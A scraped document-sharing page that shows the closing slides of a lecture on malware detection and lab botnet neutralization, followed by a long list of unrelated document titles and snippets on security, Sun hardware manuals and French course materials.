81 Botnet neutralization in the lab: attack scenario (diagram on the slide, including a white C&C).

82 A Sybil attack.

83 Spam sent by the botnet.

84 RLIST infections for repeaters.

85 High Security, Nancy (lhs.loria.fr): telescope & honeypots; in vitro experiment clusters.

86 Conclusions

87 Conclusion. Mathematical definitions of malware, with tools: a high-level representation of binaries; abstract signatures which are robust w.r.t. obfuscations; experiments and theories; analysis tools combining static and dynamic analysis; detection and neutralization heuristics.

88 Thanks!


More information

Sun Enterprise Optional Power Sequencer Installation Guide

Sun Enterprise Optional Power Sequencer Installation Guide Sun Enterprise Optional Power Sequencer Installation Guide For the Sun Enterprise 6500/5500 System Cabinet and the Sun Enterprise 68-inch Expansion Cabinet Sun Microsystems, Inc. 901 San Antonio Road Palo

More information

Binary Code Extraction and Interface Identification for Security Applications

Binary Code Extraction and Interface Identification for Security Applications Binary Code Extraction and Interface Identification for Security Applications Juan Caballero Noah M. Johnson Stephen McCamant Dawn Song UC Berkeley Carnegie Mellon University Abstract Binary code reuse

More information

Guidance Regarding Skype and Other P2P VoIP Solutions

Guidance Regarding Skype and Other P2P VoIP Solutions Guidance Regarding Skype and Other P2P VoIP Solutions Ver. 1.1 June 2012 Guidance Regarding Skype and Other P2P VoIP Solutions Scope This paper relates to the use of peer-to-peer (P2P) VoIP protocols,

More information

Harnessing Intelligence from Malware Repositories

Harnessing Intelligence from Malware Repositories Harnessing Intelligence from Malware Repositories Arun Lakhotia and Vivek Notani Software Research Lab University of Louisiana at Lafayette arun@louisiana.edu, vxn4849@louisiana.edu 7/22/2015 (C) 2015

More information

Covert Channels inside DNS

Covert Channels inside DNS Covert Channels inside DNS Lucas Nussbaum Lucas Nussbaum Covert Channels inside DNS 1 / 23 Introduction On many networks, to access the Internet: you have to pay (airports, train stations, hotels) or you

More information

LASTLINE WHITEPAPER. Why Anti-Virus Solutions Based on Static Signatures Are Easy to Evade

LASTLINE WHITEPAPER. Why Anti-Virus Solutions Based on Static Signatures Are Easy to Evade LASTLINE WHITEPAPER Why Anti-Virus Solutions Based on Static Signatures Are Easy to Evade Abstract Malicious code is an increasingly important problem that threatens the security of computer systems. The

More information

Self Protection Techniques in Malware

Self Protection Techniques in Malware DSIE 10 5 th Doctoral lsymposium on Informatics Engineering i January 28 29, 2010 Porto, Portugal Self Protection Techniques in Malware Tiago Santos Overview Introduction Malware Types Why Self Protection?

More information

Linux A multi-purpose executive support for civil avionics applications?

Linux A multi-purpose executive support for civil avionics applications? August 2004 Serge GOIFFON Pierre GAUFILLET AIRBUS France Linux A multi-purpose executive support for civil avionics applications? Civil avionics software context Main characteristics Required dependability

More information

Reconstruction d un modèle géométrique à partir d un maillage 3D issu d un scanner surfacique

Reconstruction d un modèle géométrique à partir d un maillage 3D issu d un scanner surfacique Reconstruction d un modèle géométrique à partir d un maillage 3D issu d un scanner surfacique Silvère Gauthier R. Bénière, W. Puech, G. Pouessel, G. Subsol LIRMM, CNRS, Université Montpellier, France C4W,

More information

Streamlined Malware Incident Response with EnCase

Streamlined Malware Incident Response with EnCase Streamlined Malware Incident Response www.encase.com/ceic C:\>whoami Joseph R. Salazar Information Technology since 1995 Information Security since 1997 Major (retired, USAR) with 22 years as a Counterintelligence

More information

SunFDDI 6.0 on the Sun Enterprise 10000 Server

SunFDDI 6.0 on the Sun Enterprise 10000 Server SunFDDI 6.0 on the Sun Enterprise 10000 Server Sun Microsystems, Inc. 901 San Antonio Road Palo Alto, CA 94303-4900 USA 650 960-1300 Fax 650 969-9131 Part No.: 806-3610-11 November 1999, Revision A Send

More information

Introduction. GEAL Bibliothèque Java pour écrire des algorithmes évolutionnaires. Objectifs. Simplicité Evolution et coévolution Parallélisme

Introduction. GEAL Bibliothèque Java pour écrire des algorithmes évolutionnaires. Objectifs. Simplicité Evolution et coévolution Parallélisme GEAL 1.2 Generic Evolutionary Algorithm Library http://dpt-info.u-strasbg.fr/~blansche/fr/geal.html 1 /38 Introduction GEAL Bibliothèque Java pour écrire des algorithmes évolutionnaires Objectifs Généricité

More information

The Need For Speed. leads to PostgreSQL. Dimitri Fontaine dimitri@2ndquadrant.fr. 28 Mars 2013

The Need For Speed. leads to PostgreSQL. Dimitri Fontaine dimitri@2ndquadrant.fr. 28 Mars 2013 The Need For Speed leads to PostgreSQL Dimitri Fontaine dimitri@2ndquadrant.fr 28 Mars 2013 Dimitri Fontaine dimitri@2ndquadrant.fr The Need For Speed 28 Mars 2013 1 / 23 Dimitri Fontaine 2ndQuadrant France

More information

Sun Cluster 2.2 7/00 Data Services Update: Apache Web Server

Sun Cluster 2.2 7/00 Data Services Update: Apache Web Server Sun Cluster 2.2 7/00 Data Services Update: Apache Web Server Sun Microsystems, Inc. 901 San Antonio Road Palo Alto, CA 94303-4900 U.S.A. 650-960-1300 Part No. 806-6121 July 2000, Revision A Copyright 2000

More information

1949 Self-reproducing cellular automata. 1959 Core Wars

1949 Self-reproducing cellular automata. 1959 Core Wars 114 Virus timeline When did viruses, Trojans and worms begin to pose a threat? Most histories of viruses start with the Brain virus, written in 1986. That was just the first virus for a Microsoft PC, though.

More information

-Duplication of Time-Varying Graphs

-Duplication of Time-Varying Graphs -Duplication of Time-Varying Graphs François Queyroi Sorbonne Universités, UPMC Univ Paris 06, UMR 7606, LIP6, F-75005, Paris CNRS, UMR 7606, LIP6, F-75005, Paris, France francois.queyroi@lip6.fr ABSTRACT.

More information

Welcome To The L.R.F.H.S. Computer Group Wednesday 27 th November 2013

Welcome To The L.R.F.H.S. Computer Group Wednesday 27 th November 2013 Welcome To The L.R.F.H.S. Computer Group Wednesday 27 th November 2013 BACKUP SECURITY AND THE CLOUD BACK UP ALWAYS BACK UP TO AN EXTERNAL DEVICE OR REMOVAL MEDIA- NEVER DIRECTLY ON TO YOUR COMPUTER IF

More information

Personnalisez votre intérieur avec les revêtements imprimés ALYOS design

Personnalisez votre intérieur avec les revêtements imprimés ALYOS design Plafond tendu à froid ALYOS technology ALYOS technology vous propose un ensemble de solutions techniques pour vos intérieurs. Spécialiste dans le domaine du plafond tendu, nous avons conçu et développé

More information

Properties of Stabilizing Computations

Properties of Stabilizing Computations Theory and Applications of Mathematics & Computer Science 5 (1) (2015) 71 93 Properties of Stabilizing Computations Mark Burgin a a University of California, Los Angeles 405 Hilgard Ave. Los Angeles, CA

More information

EPREUVE D EXPRESSION ORALE. SAVOIR et SAVOIR-FAIRE

EPREUVE D EXPRESSION ORALE. SAVOIR et SAVOIR-FAIRE EPREUVE D EXPRESSION ORALE SAVOIR et SAVOIR-FAIRE Pour présenter la notion -The notion I m going to deal with is The idea of progress / Myths and heroes Places and exchanges / Seats and forms of powers

More information

PROACTIVE PROTECTION MADE EASY

PROACTIVE PROTECTION MADE EASY PROACTIVE PROTECTION AUTHOR: ANDREW NIKISHIN KASPERSKY LAB Heuristic Analyzer Policy-Based Security Intrusion Prevention System (IPS) Protection against Buffer Overruns Behaviour Blockers Different Approaches

More information

Optimizing Solaris Resources Through Load Balancing

Optimizing Solaris Resources Through Load Balancing Optimizing Solaris Resources Through Load Balancing By Tom Bialaski - Enterprise Engineering Sun BluePrints Online - June 1999 http://www.sun.com/blueprints Sun Microsystems, Inc. 901 San Antonio Road

More information

Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com

Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com A number of devices are running Linux due to its flexibility and open source nature. This has made Linux platform

More information

CSE331: Introduction to Networks and Security. Lecture 17 Fall 2006

CSE331: Introduction to Networks and Security. Lecture 17 Fall 2006 CSE331: Introduction to Networks and Security Lecture 17 Fall 2006 Announcements Project 2 is due next Weds. Homework 2 has been assigned: It's due on Monday, November 6th. CSE331 Fall 2004 2 Summary:

More information

Sun Management Center 3.6 Version 5 Add-On Software Release Notes

Sun Management Center 3.6 Version 5 Add-On Software Release Notes Sun Management Center 3.6 Version 5 Add-On Software Release Notes For Sun Fire, Sun Blade, Netra, and Sun Ultra Systems Sun Microsystems, Inc. www.sun.com Part No. 819-7977-10 October 2006, Revision A

More information

F-Secure Internet Security 2014 Data Transfer Declaration

F-Secure Internet Security 2014 Data Transfer Declaration F-Secure Internet Security 2014 Data Transfer Declaration The product s impact on privacy and bandwidth usage F-Secure Corporation April 15 th 2014 Table of Contents Version history... 3 Abstract... 3

More information

Machine de Soufflage defibre

Machine de Soufflage defibre Machine de Soufflage CABLE-JET Tube: 25 à 63 mm Câble Fibre Optique: 6 à 32 mm Description générale: La machine de soufflage parfois connu sous le nom de «câble jet», comprend une chambre d air pressurisé

More information

Fine-grained covert debugging using hypervisors and analysis via visualization

Fine-grained covert debugging using hypervisors and analysis via visualization Reverse Engineering by Crayon: Game Changing Hypervisor and Visualization Analysis Fine-grained covert debugging using hypervisors and analysis via visualization Daniel A. Quist Lorie M. Liebrock Offensive

More information

From Georgia, with Love Win32/Georbot. Is someone trying to spy on Georgians?

From Georgia, with Love Win32/Georbot. Is someone trying to spy on Georgians? From Georgia, with Love Win32/Georbot Is someone trying to spy on Georgians? At the beginning of the year, a curious piece of malware came to our attention. An analyst in our virus laboratory noticed that

More information

Networks and Security Lab. Network Forensics

Networks and Security Lab. Network Forensics Networks and Security Lab Network Forensics Network Forensics - continued We start off from the previous week s exercises and analyze each trace file in detail. Tools needed: Wireshark and your favorite

More information

Office of the Auditor General / Bureau du vérificateur général FOLLOW-UP TO THE 2010 AUDIT OF COMPRESSED WORK WEEK AGREEMENTS 2012 SUIVI DE LA

Office of the Auditor General / Bureau du vérificateur général FOLLOW-UP TO THE 2010 AUDIT OF COMPRESSED WORK WEEK AGREEMENTS 2012 SUIVI DE LA Office of the Auditor General / Bureau du vérificateur général FOLLOW-UP TO THE 2010 AUDIT OF COMPRESSED WORK WEEK AGREEMENTS 2012 SUIVI DE LA VÉRIFICATION DES ENTENTES DE SEMAINE DE TRAVAIL COMPRIMÉE

More information

Malware. Prof. Tom Austin San José State University Spring 2014

Malware. Prof. Tom Austin San José State University Spring 2014 Malware Prof. Tom Austin San José State University Spring 2014 Or: The Cat & Mouse Game Attackers and Defenders Play 1971 "I'M THE CREEPER : "I'M THE CREEPER : CATCH ME IF YOU CAN." CATCH ME IF YOU CAN."

More information

Computer Security DD2395

Computer Security DD2395 Computer Security DD2395 http://www.csc.kth.se/utbildning/kth/kurser/dd2395/dasakh11/ Fall 2011 Sonja Buchegger buc@kth.se Lecture 7 Malicious Software DD2395 Sonja Buchegger 1 Course Admin Lab 2: - prepare

More information

Veritas Storage Foundation 5.0 Software for SPARC

Veritas Storage Foundation 5.0 Software for SPARC Veritas Storage Foundation 5.0 Software for SPARC Release Note Supplement Sun Microsystems, Inc. www.sun.com Part No. 819-7074-10 July 2006 Submit comments about this document at: http://www.sun.com/hwdocs/feedback

More information

Sun StorEdge RAID Manager 6.2.21 Release Notes

Sun StorEdge RAID Manager 6.2.21 Release Notes Sun StorEdge RAID Manager 6.2.21 Release Notes formicrosoftwindowsnt Sun Microsystems, Inc. 901 San Antonio Road Palo Alto, CA 94303-4900 USA 650 960-1300 Fax 650 969-9131 Part No. 805-6890-11 November

More information

Archived Content. Contenu archivé

Archived Content. Contenu archivé ARCHIVED - Archiving Content ARCHIVÉE - Contenu archivé Archived Content Contenu archivé Information identified as archived is provided for reference, research or recordkeeping purposes. It is not subject

More information

Upgrading the Solaris PC NetLink Software

Upgrading the Solaris PC NetLink Software Upgrading the Solaris PC NetLink Software By Don DeVitt - Enterprise Engineering Sun BluePrints OnLine - January 2000 http://www.sun.com/blueprints Sun Microsystems, Inc. 901 San Antonio Road Palo Alto,

More information

Tanenbaum, Computer Networks (extraits) Adaptation par J.Bétréma. DNS The Domain Name System

Tanenbaum, Computer Networks (extraits) Adaptation par J.Bétréma. DNS The Domain Name System Tanenbaum, Computer Networks (extraits) Adaptation par J.Bétréma DNS The Domain Name System RFC 1034 Network Working Group P. Mockapetris Request for Comments: 1034 ISI Obsoletes: RFCs 882, 883, 973 November

More information

Multifaceted Approach to Understanding the Botnet Phenomenon

Multifaceted Approach to Understanding the Botnet Phenomenon Multifaceted Approach to Understanding the Botnet Phenomenon Christos P. Margiolas University of Crete A brief presentation for the paper: Multifaceted Approach to Understanding the Botnet Phenomenon Basic

More information

Service Level Definitions and Interactions

Service Level Definitions and Interactions Service Level Definitions and Interactions By Adrian Cockcroft - Enterprise Engineering Sun BluePrints OnLine - April 1999 http://www.sun.com/blueprints Sun Microsystems, Inc. 901 San Antonio Road Palo

More information

Custom Penetration Testing

Custom Penetration Testing Custom Penetration Testing Compromising a Vulnerability through Discovery and Custom Exploitation Stephen Sims Advanced Penetration Testing - 2009 SANS 1 Objectives Penetration Testing Precompiled Tools

More information

TP : Configuration de routeurs CISCO

TP : Configuration de routeurs CISCO TP : Configuration de routeurs CISCO Sovanna Tan Novembre 2010 révision décembre 2012 1/19 Sovanna Tan TP : Routeurs CISCO Plan 1 Présentation du routeur Cisco 1841 2 Le système d exploitation /19 Sovanna

More information

OutbreakShield Effective and Immediate Protection against Email Virus Outbreaks

OutbreakShield Effective and Immediate Protection against Email Virus Outbreaks OutbreakShield Effective and Immediate Protection against Email Virus Outbreaks Ralf Benzmüller G DATA Software AG Introduction The virus protection provided by all current antivirus software products

More information

CORPORATE AV / EPP COMPARATIVE ANALYSIS

CORPORATE AV / EPP COMPARATIVE ANALYSIS CORPORATE AV / EPP COMPARATIVE ANALYSIS Exploit Evasion Defenses 2013 Randy Abrams, Dipti Ghimire, Joshua Smith Tested Vendors AVG, ESET, F- Secure, Kaspersky, McAfee, Microsoft, Norman, Panda, Sophos,

More information

Data Structure Reverse Engineering

Data Structure Reverse Engineering Data Structure Reverse Engineering Digging for Data Structures Polymorphic Software with DSLR Scott Hand October 28 th, 2011 Outline 1 Digging for Data Structures Motivations Introduction Laika Details

More information

Certified Ethical Hacker Exam 312-50 Version Comparison. Version Comparison

Certified Ethical Hacker Exam 312-50 Version Comparison. Version Comparison CEHv8 vs CEHv7 CEHv7 CEHv8 19 Modules 20 Modules 90 Labs 110 Labs 1700 Slides 1770 Slides Updated information as per the latest developments with a proper flow Classroom friendly with diagrammatic representation

More information

1-20020138637 26-sept-2002 Computer architecture and software cells for broadband networks Va avec 6526491

1-20020138637 26-sept-2002 Computer architecture and software cells for broadband networks Va avec 6526491 Les brevets CELL 14 décembre 2006 1 ARCHITECTURE GENERALE 1-20020138637 26-sept-2002 Computer architecture and software cells for broadband networks 6526491 2-6526491 25-févr-03 Memory protection system

More information

Sun TM SNMP Management Agent Release Notes, Version 1.6

Sun TM SNMP Management Agent Release Notes, Version 1.6 Sun TM SNMP Management Agent Release Notes, Version 1.6 Sun Microsystems, Inc. www.sun.com Part No. 820-5966-12 December 2008, Revision A Submit comments about this document by clicking the Feedback[+]

More information

Archived Content. Contenu archivé

Archived Content. Contenu archivé ARCHIVED - Archiving Content ARCHIVÉE - Contenu archivé Archived Content Contenu archivé Information identified as archived is provided for reference, research or recordkeeping purposes. It is not subject

More information

16-Port Gigabit Green Switch (TEG-S16Dg) 24-Port Gigabit Green Switch (TEG-S24Dg)

16-Port Gigabit Green Switch (TEG-S16Dg) 24-Port Gigabit Green Switch (TEG-S24Dg) 16-Port Gigabit Green Switch (TEG-S16Dg) 24-Port Gigabit Green Switch (TEG-S24Dg) ŸGuide d'installation rapide (1) ŸTechnical Specifications (3) ŸTroubleshooting (4) 1.02 1. Avant de commencer Contenu

More information

Introduction. Application Security. Reasons For Reverse Engineering. This lecture. Java Byte Code

Introduction. Application Security. Reasons For Reverse Engineering. This lecture. Java Byte Code Introduction Application Security Tom Chothia Computer Security, Lecture 16 Compiled code is really just data which can be edit and inspected. By examining low level code protections can be removed and

More information

Attacking Obfuscated Code with IDA Pro. Chris Eagle

Attacking Obfuscated Code with IDA Pro. Chris Eagle Attacking Obfuscated Code with IDA Pro Chris Eagle Outline Introduction Operation Demos Summary 2 First Order Of Business MOVE UP AND IN! There is plenty of room up front I can't increase the font size

More information

AIRBUS VHT Framework - Mascot-NuM presentation - Emmanuelle Garcia

AIRBUS VHT Framework - Mascot-NuM presentation - Emmanuelle Garcia AIRBUS Virtual Hybrid Testing Framework: focus on V&V concerns Dr. Emmanuelle Garcia, Airbus Toulouse, EZMM, strategy, process, methods and tools, simulation projects GdR Mascot-NuM workshop on Model V&V,

More information

Obfuscation: know your enemy

Obfuscation: know your enemy Obfuscation: know your enemy Ninon EYROLLES neyrolles@quarkslab.com Serge GUELTON sguelton@quarkslab.com Prelude Prelude Plan 1 Introduction What is obfuscation? 2 Control flow obfuscation 3 Data flow

More information

CS 356 Lecture 9 Malicious Code. Spring 2013

CS 356 Lecture 9 Malicious Code. Spring 2013 CS 356 Lecture 9 Malicious Code Spring 2013 Review Chapter 1: Basic Concepts and Terminology Integrity, Confidentiality, Availability, Authentication, and Accountability Types of threats: active vs. passive,

More information

Loophole+ with Ethical Hacking and Penetration Testing

Loophole+ with Ethical Hacking and Penetration Testing Loophole+ with Ethical Hacking and Penetration Testing Duration Lecture and Demonstration: 15 Hours Security Challenge: 01 Hours Introduction Security can't be guaranteed. As Clint Eastwood once said,

More information

Trends in Malware DRAFT OUTLINE. Wednesday, October 10, 12

Trends in Malware DRAFT OUTLINE. Wednesday, October 10, 12 Trends in Malware DRAFT OUTLINE Presentation Synopsis Security is often a game of cat and mouse as security professionals and attackers each vie to stay one step ahead of the other. In this race for dominance,

More information

Effective and Efficient Malware Detection at the End Host

Effective and Efficient Malware Detection at the End Host Effective and Efficient Malware Detection at the End Host Clemens Kolbitsch, Paolo Milani Comparetti, Christopher Kruegel, Engin Kirda, Xiaoyong Zhou, and XiaoFeng Wang Secure Systems Lab, TU Vienna {ck,pmilani}@seclab.tuwien.ac.at

More information

Les fragments. Programmation Mobile Android Master CCI. Une application avec deux fragments. Premier layout : le formulaire

Les fragments. Programmation Mobile Android Master CCI. Une application avec deux fragments. Premier layout : le formulaire Programmation Mobile Android Master CCI Bertrand Estellon Aix-Marseille Université March 23, 2015 Bertrand Estellon (AMU) Android Master CCI March 23, 2015 1 / 266 Les fragments Un fragment : représente

More information

OS Security. Malware. Radboud University Nijmegen, The Netherlands. Winter 2014/2015

OS Security. Malware. Radboud University Nijmegen, The Netherlands. Winter 2014/2015 OS Security Malware Radboud University Nijmegen, The Netherlands Winter 2014/2015 Last week... OS Security Malware 2 A short recap Important concept to reduce covert channels and possible damage by an

More information

BoSSaBoTv2 : another Linux Backdoor IRC malekal's site

BoSSaBoTv2 : another Linux Backdoor IRC malekal's site Projet antimalwares Comparatif Antivirus Soutenir Malekal.com Forum Me contacter malekal's site site entraide informatique Rechercher... Rechercher Articles/Papiers Projet antimalwares Comparatif Antivirus

More information

(IALC, Chapters 8 and 9) Introduction to Turing s life, Turing machines, universal machines, unsolvable problems.

(IALC, Chapters 8 and 9) Introduction to Turing s life, Turing machines, universal machines, unsolvable problems. 3130CIT: Theory of Computation Turing machines and undecidability (IALC, Chapters 8 and 9) Introduction to Turing s life, Turing machines, universal machines, unsolvable problems. An undecidable problem

More information

Sun Management Center 3.5 Update 1b Release Notes

Sun Management Center 3.5 Update 1b Release Notes Sun Management Center 3.5 Update 1b Release Notes Sun Microsystems, Inc. 4150 Network Circle Santa Clara, CA 95054 U.S.A. Part No: 819 3054 10 June 2005 Copyright 2005 Sun Microsystems, Inc. 4150 Network

More information

Malicious Software. Ola Flygt Växjö University, Sweden http://w3.msi.vxu.se/users/ofl/ Ola.Flygt@vxu.se +46 470 70 86 49. Viruses and Related Threats

Malicious Software. Ola Flygt Växjö University, Sweden http://w3.msi.vxu.se/users/ofl/ Ola.Flygt@vxu.se +46 470 70 86 49. Viruses and Related Threats Malicious Software Ola Flygt Växjö University, Sweden http://w3.msi.vxu.se/users/ofl/ Ola.Flygt@vxu.se +46 470 70 86 49 1 Outline Viruses and Related Threats Malicious Programs The Nature of Viruses Antivirus

More information

Malicious Programs. CEN 448 Security and Internet Protocols Chapter 19 Malicious Software

Malicious Programs. CEN 448 Security and Internet Protocols Chapter 19 Malicious Software CEN 448 Security and Internet Protocols Chapter 19 Malicious Software Dr. Mostafa Hassan Dahshan Computer Engineering Department College of Computer and Information Sciences King Saud University mdahshan@ccis.ksu.edu.sa

More information

VIRUS TRACKER CHALLENGES OF RUNNING A LARGE SCALE SINKHOLE OPERATION

VIRUS TRACKER CHALLENGES OF RUNNING A LARGE SCALE SINKHOLE OPERATION VIRUS TRACKER CHALLENGES OF RUNNING A LARGE SCALE SINKHOLE OPERATION Kleissner & Associates Botconf 14, 3-5 Dec 2014, Nancy/France Worlds largest botnet monitoring system Since September 2012 Originally

More information

Informatique Fondamentale IMA S8

Informatique Fondamentale IMA S8 Informatique Fondamentale IMA S8 Cours 1 - Intro + schedule + finite state machines Laure Gonnord http://laure.gonnord.org/pro/teaching/ Laure.Gonnord@polytech-lille.fr Université Lille 1 - Polytech Lille

More information

Sun StorEdge N8400 Filer Release Notes

Sun StorEdge N8400 Filer Release Notes Sun StorEdge N8400 Filer Release Notes Sun Microsystems, Inc. 901 San Antonio Road Palo Alto, CA 94303 U.S.A. 650-960-1300 Part No. 806-6888-10 February 2001, Revision A Send comments about this document

More information